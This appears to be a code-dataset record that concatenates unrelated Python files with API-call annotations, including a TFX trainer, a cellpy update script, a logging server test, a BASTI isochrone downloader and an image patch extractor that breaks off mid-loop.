'math.atan', 'math.atan', (['((corners[idx][0][2][1] - corners[idx][0][0][1]) / (corners[idx][0][2][0] -\n corners[idx][0][0][0]))'], {}), '((corners[idx][0][2][1] - corners[idx][0][0][1]) / (corners[idx][0\n ][2][0] - corners[idx][0][0][0]))\n', (2963, 3067), False, 'import sys, time, math\n'), ((3855, 3940), 'cv2.putText', 'cv2.putText', (['frame', 'str_position', '(0, 100)', 'font', '(1)', '(0, 255, 0)', '(2)', 'cv2.LINE_AA'], {}), '(frame, str_position, (0, 100), font, 1, (0, 255, 0), 2, cv2.LINE_AA\n )\n', (3866, 3940), False, 'import cv2\n'), ((4389, 4403), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (4400, 4403), False, 'import cv2\n'), ((4507, 4530), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (4528, 4530), False, 'import cv2\n')]
|
import tensorflow as tf
import tensorflow_model_analysis as tfma
from tfx.proto import trainer_pb2
def gzip_reader_fn(filenames):
return tf.data.TFRecordDataset(
filenames,
compression_type='GZIP')
def get_feature_spec():
feature_spec = {}
for key in range(0, 200):
feature_spec['var_{0}'.format(key)] = tf.io.FixedLenFeature([], dtype=tf.float32)
feature_spec['target'] = tf.io.FixedLenFeature([], dtype=tf.int64)
return feature_spec
def input_fn(filenames, tf_transform_output=None, batch_size=200):
feature_spec = feature_spec = get_feature_spec()
dataset = tf.data.experimental.make_batched_features_dataset(filenames, 10, feature_spec, reader=gzip_reader_fn)
features_dict = tf.compat.v1.data.make_one_shot_iterator(dataset).get_next()
label = features_dict.pop('target')
return features_dict, label
def eval_input_receiver():
feature_spec = get_feature_spec()
# input placeholder, bytes of a tf.Example
serialized_tf_example = tf.compat.v1.placeholder(
dtype=tf.string, shape=[None], name='input_example_tensor')
# parse input raw to tf.Example
features = tf.io.parse_example(serialized_tf_example, feature_spec)
return tfma.export.EvalInputReceiver(
features=features,
labels=features['target'],
receiver_tensors={'examples': serialized_tf_example})
def trainer_fn(trainer_fn_args, schema):
feature_columns = [tf.feature_column.numeric_column('var_{0}'.format(key)) for key in range(0, 200)]
estimator = tf.estimator.DNNClassifier(
feature_columns=feature_columns,
hidden_units=[50, 25])
train_spec = tf.estimator.TrainSpec(
lambda: input_fn(trainer_fn_args.train_files),
max_steps=trainer_fn_args.train_steps)
eval_spec = tf.estimator.EvalSpec(
lambda: input_fn(trainer_fn_args.eval_files),
steps=trainer_fn_args.eval_steps)
receiver_fn = lambda: eval_input_receiver()
return {
'estimator': estimator,
'train_spec': train_spec,
'eval_spec': eval_spec,
'eval_input_receiver_fn': receiver_fn
}
|
[
"tensorflow_model_analysis.export.EvalInputReceiver",
"tensorflow.data.TFRecordDataset",
"tensorflow.compat.v1.placeholder",
"tensorflow.data.experimental.make_batched_features_dataset",
"tensorflow.compat.v1.data.make_one_shot_iterator",
"tensorflow.io.parse_example",
"tensorflow.io.FixedLenFeature",
"tensorflow.estimator.DNNClassifier"
] |
[((140, 199), 'tensorflow.data.TFRecordDataset', 'tf.data.TFRecordDataset', (['filenames'], {'compression_type': '"""GZIP"""'}), "(filenames, compression_type='GZIP')\n", (163, 199), True, 'import tensorflow as tf\n'), ((399, 440), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['[]'], {'dtype': 'tf.int64'}), '([], dtype=tf.int64)\n', (420, 440), True, 'import tensorflow as tf\n'), ((595, 701), 'tensorflow.data.experimental.make_batched_features_dataset', 'tf.data.experimental.make_batched_features_dataset', (['filenames', '(10)', 'feature_spec'], {'reader': 'gzip_reader_fn'}), '(filenames, 10,\n feature_spec, reader=gzip_reader_fn)\n', (645, 701), True, 'import tensorflow as tf\n'), ((982, 1071), 'tensorflow.compat.v1.placeholder', 'tf.compat.v1.placeholder', ([], {'dtype': 'tf.string', 'shape': '[None]', 'name': '"""input_example_tensor"""'}), "(dtype=tf.string, shape=[None], name=\n 'input_example_tensor')\n", (1006, 1071), True, 'import tensorflow as tf\n'), ((1121, 1177), 'tensorflow.io.parse_example', 'tf.io.parse_example', (['serialized_tf_example', 'feature_spec'], {}), '(serialized_tf_example, feature_spec)\n', (1140, 1177), True, 'import tensorflow as tf\n'), ((1188, 1321), 'tensorflow_model_analysis.export.EvalInputReceiver', 'tfma.export.EvalInputReceiver', ([], {'features': 'features', 'labels': "features['target']", 'receiver_tensors': "{'examples': serialized_tf_example}"}), "(features=features, labels=features['target'],\n receiver_tensors={'examples': serialized_tf_example})\n", (1217, 1321), True, 'import tensorflow_model_analysis as tfma\n'), ((1497, 1584), 'tensorflow.estimator.DNNClassifier', 'tf.estimator.DNNClassifier', ([], {'feature_columns': 'feature_columns', 'hidden_units': '[50, 25]'}), '(feature_columns=feature_columns, hidden_units=[\n 50, 25])\n', (1523, 1584), True, 'import tensorflow as tf\n'), ((328, 371), 'tensorflow.io.FixedLenFeature', 'tf.io.FixedLenFeature', (['[]'], {'dtype': 'tf.float32'}), '([], dtype=tf.float32)\n', (349, 371), True, 'import tensorflow as tf\n'), ((717, 766), 'tensorflow.compat.v1.data.make_one_shot_iterator', 'tf.compat.v1.data.make_one_shot_iterator', (['dataset'], {}), '(dataset)\n', (757, 766), True, 'import tensorflow as tf\n')]
|
import os
from sys import platform
from typing import Any, Dict, List
import pymysql
import yaml
url_prefix = 'api/v%s' % ('.'.join(os.environ['UWKGM_API_VERSION'].split('.')[:2]))
def envyml(name: str, base_dir: str, var: str) -> Any:
def walk(sub_tree: Dict[str, Any], sub_path: List[str]) -> Any:
return walk(sub_tree[sub_path[0]], sub_path[1:]) if len(sub_path) > 1 else sub_tree[sub_path[0]]
path = var.split('.')
return walk(yaml.safe_load(open('%s/env/%s.yaml' % (base_dir, path[0]), 'r'))[os.environ[name]], path[1:])
if platform == 'darwin':
pymysql.install_as_MySQLdb()
|
[
"pymysql.install_as_MySQLdb"
] |
[((583, 611), 'pymysql.install_as_MySQLdb', 'pymysql.install_as_MySQLdb', ([], {}), '()\n', (609, 611), False, 'import pymysql\n')]
|
import pathlib
import os
import sys
import cellpy
from cellpy import cellreader
from cellpy import log
log.setup_logging(default_level="DEBUG")
def load_c_file(filename):
c = cellreader.CellpyData()
c.load(filename)
return c
def load_r_file(filename):
c = cellreader.CellpyData()
c.from_raw(filename)
return c
def update(c):
c.make_step_table()
c.make_summary(find_ir=True)
return c
print("updating cellpy files")
hdf_dir = pathlib.Path("../testdata/hdf5").resolve()
res_dir = pathlib.Path("../testdata/data").resolve()
print(f"cellpy file directory: {hdf_dir.is_dir()}")
files = os.listdir(hdf_dir)
print(f"content: {files}")
print(f"raw file directory: {res_dir.is_dir()}")
files = os.listdir(res_dir)
print(f"content: {files}")
standard_file = hdf_dir / "20160805_test001_45_cc.h5"
extra_file = hdf_dir / "20160805_test001_47_cc.h5"
standard_raw_file = res_dir / "20160805_test001_45_cc_01.res"
updated_standard_file = hdf_dir / "20160805_test001_45_cc.h5"
updated_extra_file = hdf_dir / "20160805_test001_47_cc.h5"
#
c = load_r_file(standard_raw_file)
print(f"{c.cell.raw.columns}")
c.make_step_table()
c.make_summary(find_ir=True)
c.save(updated_standard_file)
#
# print(f"loading standard file {standard_file}")
# c = load_c_file(standard_file)
# print("updating")
# c = update(c)
# print(f"saving")
# c.save(updated_standard_file)
print(f"loading standard file {extra_file}")
c = load_c_file(extra_file)
print("updating")
c = update(c)
print(f"saving")
c.save(updated_extra_file)
|
[
"pathlib.Path",
"cellpy.log.setup_logging",
"cellpy.cellreader.CellpyData",
"os.listdir"
] |
[((105, 145), 'cellpy.log.setup_logging', 'log.setup_logging', ([], {'default_level': '"""DEBUG"""'}), "(default_level='DEBUG')\n", (122, 145), False, 'from cellpy import log\n'), ((627, 646), 'os.listdir', 'os.listdir', (['hdf_dir'], {}), '(hdf_dir)\n', (637, 646), False, 'import os\n'), ((732, 751), 'os.listdir', 'os.listdir', (['res_dir'], {}), '(res_dir)\n', (742, 751), False, 'import os\n'), ((183, 206), 'cellpy.cellreader.CellpyData', 'cellreader.CellpyData', ([], {}), '()\n', (204, 206), False, 'from cellpy import cellreader\n'), ((278, 301), 'cellpy.cellreader.CellpyData', 'cellreader.CellpyData', ([], {}), '()\n', (299, 301), False, 'from cellpy import cellreader\n'), ((470, 502), 'pathlib.Path', 'pathlib.Path', (['"""../testdata/hdf5"""'], {}), "('../testdata/hdf5')\n", (482, 502), False, 'import pathlib\n'), ((523, 555), 'pathlib.Path', 'pathlib.Path', (['"""../testdata/data"""'], {}), "('../testdata/data')\n", (535, 555), False, 'import pathlib\n')]
|
import pkg_resources
pkg_resources.declare_namespace(__name__)
__version__ = '2'
|
[
"pkg_resources.declare_namespace"
] |
[((21, 62), 'pkg_resources.declare_namespace', 'pkg_resources.declare_namespace', (['__name__'], {}), '(__name__)\n', (52, 62), False, 'import pkg_resources\n')]
|
import requests, json
def get_subs(page):
metadata = get_metadata(page)
return metadata['subtitles']
def get_metadata(page):
meta = page.text.split('vilos.config.media = ')[1].split(';\n\n')[0]
return json.loads(meta)
|
[
"json.loads"
] |
[((219, 235), 'json.loads', 'json.loads', (['meta'], {}), '(meta)\n', (229, 235), False, 'import requests, json\n')]
|
#!/usr/bin/env python -OO
# encoding: utf-8
###########
# ORP - Open Robotics Platform
#
# Copyright (c) 2010 <NAME>, <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
##########
"""
test_logging.py - Tests the logging capabilities of the server!
Created by <NAME> on 2010-09-24.
"""
__author__ = "<NAME>"
__copyright__ = "Copyright (c) 2010 <NAME>, <NAME>"
### Imports ###
# Standard Python Libraries
import sys
import os
import unittest
import SocketServer
import logging.handlers
import test_helper
try: # try to catch any missing dependancies
# <PKG> for <PURPOSE>
PKGNAME = '<EASY_INSTALL NAME>'
# import <LIBRARY NAME>
del PKGNAME
except ImportError as e: # We are missing something, let them know...
sys.stderr.write("You might not have the "+PKGNAME+" module, \
try 'easy_install "+PKGNAME+"', else consult google.\n"+e)
### Class ###
class LogRecordStreamHandler(SocketServer.StreamRequestHandler):
"""Handler for a streaming logging request.
This basically logs the record using whatever logging policy is
configured locally.
"""
def handle(self):
"""
Handle multiple requests - each expected to be a 4-byte length,
followed by the LogRecord in pickle format. Logs the record
according to whatever policy is configured locally.
"""
while 1:
chunk = self.connection.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = self.connection.recv(slen)
while len(chunk) < slen:
chunk = chunk + self.connection.recv(slen - len(chunk))
obj = self.unPickle(chunk)
record = logging.makeLogRecord(obj)
self.handleLogRecord(record)
def unPickle(self, data):
return cPickle.loads(data)
def handleLogRecord(self, record):
# if a name is specified, we use the named logger rather than the one
# implied by the record.
if self.server.logname is not None:
name = self.server.logname
else:
name = record.name
logger = logging.getLogger(name)
# N.B. EVERY record gets logged. This is because Logger.handle
# is normally called AFTER logger-level filtering. If you want
# to do filtering, do it at the client end to save wasting
# cycles and network bandwidth!
logger.handle(record)
class LogRecordSocketReceiver(SocketServer.ThreadingTCPServer):
"""simple TCP socket-based logging receiver suitable for testing"""
allow_reuse_address = 1
def __init__(self, host='',
port=logging.handlers.DEFAULT_TCP_LOGGING_PORT,
handler=LogRecordStreamHandler):
SocketServer.ThreadingTCPServer.__init__(self, (host, port), handler)
self.abort = 0
self.timeout = 5
self.logname = None
from threading import Lock
self.lock = Lock()
def serve_until_stopped(self):
"""docstring"""
self.lock.acquire()
import select
rd, wr, ex = select.select([self.socket.fileno()],
[], [],
self.timeout)
if rd:
self.result = True
else:
self.result = False
self.lock.release()
def serveUntilStopped(self):
"""docstring for serve_until_stopped"""
import thread
thread.start_new_thread(self.serve_until_stopped, ())
def getResult(self):
"""docstring for getResult"""
self.lock.acquire()
result = self.result
self.lock.release()
return result
class ORPDLoggingTestCases(unittest.TestCase):
"""Test case for the ORPD"""
def setUp(self):
"""Setup for tests"""
self.proc, self.server = test_helper.startServerIfStopped()
def test10_TestXMLRPCLogging(self):
"""Tests the posting of logs to the daemon
through the xmlrpc interface"""
self.server.info("Info Message")
self.server.debug("Debug Message")
self.server.warning("Warning Message")
self.server.error("Error Message")
self.server.critical("Critical Message")
def test00_NetworkLogging(self):
"""Trys to connect to and get logging messages"""
logserver = LogRecordSocketReceiver()
logserver.serveUntilStopped()
import time
time.sleep(1)
self.server.connect()
self.server.info("Testing network logging")
self.assertTrue(logserver.getResult())
del logserver
def tearDown(self):
"""Cleanup"""
pass
### Functions ###
### IfMain ###
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"thread.start_new_thread",
"time.sleep",
"threading.Lock",
"test_helper.startServerIfStopped",
"sys.stderr.write",
"SocketServer.ThreadingTCPServer.__init__"
] |
[((5815, 5830), 'unittest.main', 'unittest.main', ([], {}), '()\n', (5828, 5830), False, 'import unittest\n'), ((1750, 1902), 'sys.stderr.write', 'sys.stderr.write', (['(\'You might not have the \' + PKGNAME +\n " module, try \'easy_install " + PKGNAME +\n """\', else consult google.\n""" + e)'], {}), '(\'You might not have the \' + PKGNAME +\n " module, try \'easy_install " + PKGNAME +\n """\', else consult google.\n""" + e)\n', (1766, 1902), False, 'import sys\n'), ((3796, 3865), 'SocketServer.ThreadingTCPServer.__init__', 'SocketServer.ThreadingTCPServer.__init__', (['self', '(host, port)', 'handler'], {}), '(self, (host, port), handler)\n', (3836, 3865), False, 'import SocketServer\n'), ((3997, 4003), 'threading.Lock', 'Lock', ([], {}), '()\n', (4001, 4003), False, 'from threading import Lock\n'), ((4497, 4550), 'thread.start_new_thread', 'thread.start_new_thread', (['self.serve_until_stopped', '()'], {}), '(self.serve_until_stopped, ())\n', (4520, 4550), False, 'import thread\n'), ((4895, 4929), 'test_helper.startServerIfStopped', 'test_helper.startServerIfStopped', ([], {}), '()\n', (4927, 4929), False, 'import test_helper\n'), ((5502, 5515), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (5512, 5515), False, 'import time\n')]
|
"""
EZBASTI -- A python package that allows you to download BASTI isochrones directly from the BASTI
directly website
based on EZPADOVA and EZBASTI
:version: 0.1
:author: <NAME>
"""
from __future__ import print_function, unicode_literals, division
import sys
import os
import inspect
import time
from io import StringIO, BytesIO
import zlib
import re
import json
if sys.version_info[0] > 2:
py3k = True
from urllib.parse import urlencode
from urllib import request
from urllib.request import urlopen
else:
py3k = False
from urllib import urlencode
from urllib2 import urlopen
from io import BytesIO
import urllib.request
import tarfile
from astropy.table import Table
list_model=[['model=01,Solar-Scaled[alpha/Fe]=0.0,Overshooting:No,Diffusion:No,Mass loss:n=0.0,He=0.247','P00','P00O0D0E0Y247',],
['model=02,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.0,He=0.247','P00','P00O1D0E0Y247',],
['model=03,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.3,He=0.247','P00','P00O1D0E1Y247',],
['model=04,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247','P00','P00O1D1E1Y247',],
['model=11,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247','P04','P04O1D1E1Y247',],
['model=12,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.275','P04','P04O1D1E1Y275',],
['model=13,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.300','P04','P04O1D1E1Y300',],
['model=14,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.320','P04','P04O1D1E1Y320']]
def get_one_isochrone(model='01',FeH=0.0,age=16e6,photometry='HR'):
'''
Get Basti Iscohrone from the website:
model:str Get model number using print_model
FeH:float Mettallicity
Age:float in years
photometry:str Get photometric system using print_photometric_system()
model:
model=01,Solar-Scaled[alpha/Fe]=0.0,Overshooting:No,Diffusion:No,Mass loss:n=0.0,He=0.247
model=02,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.0,He=0.247
model=03,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.3,He=0.247
model=04,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247
model=11,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247
model=12,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.275
model=13,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.300
model=14,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.320
photometry:
"HR":HR diagram
"2MASS":2MASS
"DECAM":DECam
"Euclid":Euclid (VIS+NISP)
"GAIA-DR1":GAIA DR1
"GAIA-DR2":GAIA DR2
"GAIA-DR3":GAIA DR3
"GALEX":GALEX
"Tycho":Hipparcos+Tycho
"WFPC2":HST (WFPC2)
"ACS":HST (ACS)
"WFC3":HST (WFC3)
"JPLUS":JPLUS
"JohnsonCousins":JohnsonCousins
"JWST_NIRCam":JWST (NIRCam)
"JWST_NIRISS":JWST (NIRISS)
"Kepler":Kepler
"PanSTARSS1":PanSTARSS1
"SAGE":SAGE
"SkyMapper":SkyMapper
"Sloan":Sloan
"Spitzer_IRAC":Spitzer (IRAC)
:"Stromgren":Strömgren
"Subaru_HSC":Subaru (HSC)
"SWIFT_UVOT":SWIFT (UVOT)
"TESS":TESS
"UVIT":UVIT (FUV+NUV+VIS)
"LSST":<NAME> Obs. (LSST)
"VISTA":VISTA
"WFIRST":WFIRST (WFI)
"WISE":WISE
'''
download_url='http://basti-iac.oa-abruzzo.inaf.it/TEMP/'
url=_query(model=model,FeH=FeH,age=age,photometry=photometry)
print('Interrogating {0}...'.format(url))
print('Request...', end='')
c = urlopen(url).read()
c=c.decode()
fname = re.compile('href=".*z').findall(c)[0].split('/')[2]
min_age,max_age=_check_age(c)
if (age>=min_age) & (age<=max_age):
# furl = _cfg['download_url'] + fname
furl = download_url + fname
tarfile_url = furl
print('Request...', end='')
ftpstream = urllib.request.urlopen(tarfile_url)
tmpfile = BytesIO()
while True:
s = ftpstream.read(16384)
if not s:
break
tmpfile.write(s)
ftpstream.close()
tmpfile.seek(0)
tfile = tarfile.open(fileobj=tmpfile, mode="r:gz")
tfile_members2 = [filename for filename in tfile.getnames()]
tfile_extract1 = tfile.extractfile(tfile_members2[0])
tfile_extract_text = tfile_extract1.read().decode()
tfile.close()
tmpfile.close()
print('decompressing archive...')
text=tfile_extract_text.split('\n')
#print(text)
lines = [line_num for line_num, line_content in enumerate(text) if 'M/Mo(ini) ' in line_content]
header_full=text[lines[0]].split(' ')
header = [string for string in header_full if (string != "") & (string != "#")]
data=Table.read(text,format='ascii',names=header)
headline = [line_content for line_num, line_content in enumerate(text) if 'Np' in line_content]
if len(headline)>0:
lines = [line_content.replace('=',':').replace(" ","") for line_num, line_content in enumerate(headline[0].split(' ')) if '=' in line_content]
dict_key={}
for line in lines:
dict_key.update({line.split(':')[0]:float(line.split(':')[1])})
data[line.split(':')[0]]=float(line.split(':')[1])
print("done.")
return data
else:
print('Age not with in Range')
print('Min Age:',min_age,'yr')
print('Max Age:',max_age,'yr')
return 0
def _select_model(model):
list_model=[['model=01,Solar-Scaled[alpha/Fe]=0.0,Overshooting:No,Diffusion:No,Mass loss:n=0.0,He=0.247','P00','P00O0D0E0Y247',],
['model=02,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.0,He=0.247','P00','P00O1D0E0Y247',],
['model=03,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:No,Mass loss:n=0.3,He=0.247','P00','P00O1D0E1Y247',],
['model=04,Solar-Scaled[alpha/Fe]=0.0,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247','P00','P00O1D1E1Y247',],
['model=11,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.247','P04','P04O1D1E1Y247',],
['model=12,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.275','P04','P04O1D1E1Y275',],
['model=13,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.300','P04','P04O1D1E1Y300',],
['model=14,Alpha-enhanced[alpha/Fe]=+0.4,Overshooting:Yes,Diffusion:Yes,Mass loss:n=0.3,He=0.320','P04','P04O1D1E1Y320']]
dict_model={'01':list_model[0],'02':list_model[1],'03':list_model[2],'04':list_model[3],'05':list_model[4],'06':list_model[5],'07':list_model[6],'08':list_model[7]}
return dict_model[model]
def _query(model='01',FeH=0.0,age=1e6,photometry='HR'):
curr=_select_model(model)
age=str(age/1e6)
url='http://basti-iac.oa-abruzzo.inaf.it/cgi-bin/isoc-get.py?alpha='+curr[1]+'&grid='+curr[2]+'&metal=None&imetal=&imetalh='+str(FeH)+'&iage='+str(age)+'&bcsel='+str(photometry)
return url
def _check_age(website):
fname = re.compile(': age.*').findall(website)[0].replace('</h2>',"").split('--')
# min_age=float(re.sub('\D', '', fname[0]))*1e6
# max_age=float(re.sub('\D', '', fname[1]))*1e6
min_age=float(re.findall('\d*\.?\d+',fname[0])[0])*1e6
max_age=float(re.findall('\d*\.?\d+',fname[1])[0])*1e6
return min_age,max_age
def print_model():
for i in range(len(list_model)):
print(list_model[i][0])
def print_photometric_system():
'''
"HR":HR diagram\n
"2MASS":2MASS\n
"DECAM":DECam\n
"Euclid":Euclid (VIS+NISP)\n
"GAIA-DR1":GAIA DR1\n
"GAIA-DR2":GAIA DR2\n
"GAIA-DR3":GAIA DR3\n
"GALEX":GALEX\n
"Tycho":Hipparcos+Tycho\n
"WFPC2":HST (WFPC2)\n
"ACS":HST (ACS)\n
"WFC3":HST (WFC3)\n
"JPLUS":JPLUS\n
"JohnsonCousins":JohnsonCousins\n
"JWST_NIRCam":JWST (NIRCam)\n
"JWST_NIRISS":JWST (NIRISS)\n
"Kepler":Kepler\n
"PanSTARSS1":PanSTARSS1\n
"SAGE":SAGE\n
"SkyMapper":SkyMapper\n
"Sloan":Sloan\n
"Spitzer_IRAC":Spitzer (IRAC)\n:
"Stromgren":Strömgren\n
"Subaru_HSC":Subaru (HSC)\n
"SWIFT_UVOT":SWIFT (UVOT)\n
"TESS":TESS\n
"UVIT":UVIT (FUV+NUV+VIS)\n
"LSST":<NAME> Obs. (LSST)\n
"VISTA":VISTA\n
"WFIRST":WFIRST (WFI)\n
"WISE":WISE\n
'''
print('"HR":HR diagram\n"2MASS":2MASS\n"DECAM":DECam\n"Euclid":Euclid (VIS+NISP)\n"GAIA-DR1":GAIA DR1\n"GAIA-DR2":GAIA DR2\n"GAIA-DR3":GAIA DR3\n"GALEX":GALEX\n"Tycho":Hipparcos+Tycho\n"WFPC2":HST (WFPC2)\n"ACS":HST (ACS)\n"WFC3":HST (WFC3)\n"JPLUS":JPLUS\n"JohnsonCousins":JohnsonCousins\n"JWST_NIRCam":JWST (NIRCam)\n"JWST_NIRISS":JWST (NIRISS)\n"Kepler":Kepler\n"PanSTARSS1":PanSTARSS1\n"SAGE":SAGE\n"SkyMapper":SkyMapper\n"Sloan":Sloan\n<!"Spitzer_IRAC":Spitzer (IRAC)\n:"Stromgren":Strömgren\n"Subaru_HSC":Subaru (HSC)\n"SWIFT_UVOT":SWIFT (UVOT)\n"TESS":TESS\n"UVIT":UVIT (FUV+NUV+VIS)\n"LSST":Vera C. Rubin Obs. (LSST)\n"VISTA":VISTA\n"WFIRST":WFIRST (WFI)\n"WISE":WISE\n')
|
[
"io.BytesIO",
"re.findall",
"tarfile.open",
"urllib2.urlopen",
"astropy.table.Table.read",
"re.compile"
] |
[((4172, 4181), 'io.BytesIO', 'BytesIO', ([], {}), '()\n', (4179, 4181), False, 'from io import BytesIO\n'), ((4379, 4421), 'tarfile.open', 'tarfile.open', ([], {'fileobj': 'tmpfile', 'mode': '"""r:gz"""'}), "(fileobj=tmpfile, mode='r:gz')\n", (4391, 4421), False, 'import tarfile\n'), ((5021, 5067), 'astropy.table.Table.read', 'Table.read', (['text'], {'format': '"""ascii"""', 'names': 'header'}), "(text, format='ascii', names=header)\n", (5031, 5067), False, 'from astropy.table import Table\n'), ((3770, 3782), 'urllib2.urlopen', 'urlopen', (['url'], {}), '(url)\n', (3777, 3782), False, 'from urllib2 import urlopen\n'), ((7527, 7563), 're.findall', 're.findall', (['"""\\\\d*\\\\.?\\\\d+"""', 'fname[0]'], {}), "('\\\\d*\\\\.?\\\\d+', fname[0])\n", (7537, 7563), False, 'import re\n'), ((7586, 7622), 're.findall', 're.findall', (['"""\\\\d*\\\\.?\\\\d+"""', 'fname[1]'], {}), "('\\\\d*\\\\.?\\\\d+', fname[1])\n", (7596, 7622), False, 'import re\n'), ((3819, 3842), 're.compile', 're.compile', (['"""href=".*z"""'], {}), '(\'href=".*z\')\n', (3829, 3842), False, 'import re\n'), ((7332, 7353), 're.compile', 're.compile', (['""": age.*"""'], {}), "(': age.*')\n", (7342, 7353), False, 'import re\n')]
|
#!/usr/bin/env python
import os
import time
import traceback
from argparse import ArgumentParser
from glob import glob
import numpy as np
import tensorflow as tf
from scipy.misc import imread, imsave
from utils import (get_hand_segmentation_for_image, get_combined_segmentation_for_image,
get_patho_segmentation_for_image, hand_subdir, image_subdir, data_subdirs,
patho_subdir, combined_subdir)
def parse_arguments():
parser = ArgumentParser()
parser.add_argument("--output-dir", required=True, type=str,
help="Target directory to store the patches in")
parser.add_argument("--data-dir", type=str, default="training-data",
help="Input directory from where to load images")
parser.add_argument("--size", type=int, default=256,
help="Size of the square patches in pixels")
parser.add_argument("--step-size", type=float, default=0.5,
help="Step size to use when looking for patches as a percentage of the patch size")
parser.add_argument("--min-hand", type=float, default=1.0,
help="Minimum percentage of hand pixels")
parser.add_argument("--max-hand", type=float, default=1.0,
help="Maximum percentage of hand pixels")
parser.add_argument("--min-patho", type=float, default=0.0,
help="Minimum percentage of pathology pixels")
parser.add_argument("--max-patho", type=float, default=1.0,
help="Maximum percentage of pathology pixels")
parser.add_argument("--match-pattern", type=str, default=None,
help="Specify pattern for files to match")
parser.add_argument("--verify", action="store_true",
help="Verify data integrity if specified")
return parser.parse_args()
def verify_data_integrity(image_dir, hand_dir, patho_dir, combined_dir):
# count images in the directories
images_count = len(glob("{}/*.png".format(image_dir)))
hand_count = len(glob("{}/*.png".format(hand_dir)))
patho_count = len(glob("{}/*.png".format(patho_dir)))
combined_count = len(glob("{}/*.png".format(combined_dir)))
tf.logging.info("Image file counts: {}/{}/{}/{} (images/hand/patho/combined)".format(
images_count, hand_count, patho_count, combined_count))
assert images_count == hand_count and images_count == patho_count and images_count == combined_count
# check file names
for file_name in glob("{}/*.png".format(image_dir)):
assert os.path.isfile(get_hand_segmentation_for_image(file_name, hand_dir))
assert os.path.isfile(get_patho_segmentation_for_image(file_name, patho_dir))
assert os.path.isfile(get_combined_segmentation_for_image(file_name, combined_dir))
tf.logging.info("There seems to be exactly one hand, pathology, and combined segmentation per image")
def add_patch_to_file_name(file_name, patch_number):
assert patch_number < 1e5
return "{}_patch_{:04d}.png".format(os.path.splitext(file_name)[0], patch_number)
def find_patches_in_file(image_file, hand_dir, patho_dir, combined_dir, output_dir, args):
# pylint: disable=too-many-locals
patch_size = args.size
patch_step = int(args.size * args.step_size)
min_hand = int(patch_size * patch_size * args.min_hand)
max_hand = int(patch_size * patch_size * args.max_hand)
min_patho = int(patch_size * patch_size * args.min_patho)
max_patho = int(patch_size * patch_size * args.max_patho)
image_filename = os.path.basename(image_file)
image = imread(image_file)
hand_file = get_hand_segmentation_for_image(image_file, hand_dir)
hand_filename = os.path.basename(hand_file)
hand = imread(hand_file)
patho_file = get_patho_segmentation_for_image(image_file, patho_dir)
patho = imread(patho_file)
patho_filename = os.path.basename(patho_file)
combined_file = get_combined_segmentation_for_image(image_file, combined_dir)
combined = imread(combined_file)
combined_filename = os.path.basename(combined_file)
partial_patch_count = 0
non_hand_patch_count = 0
non_patho_patch_count = 0
found_patch_count = 0
for i in range(0, image.shape[0], patch_step):
for j in range(0, image.shape[1], patch_step):
hand_patch = hand[i:i+patch_size, j:j+patch_size]
if hand_patch.shape != (patch_size, patch_size):
# ignore partial patches
partial_patch_count += 1
continue
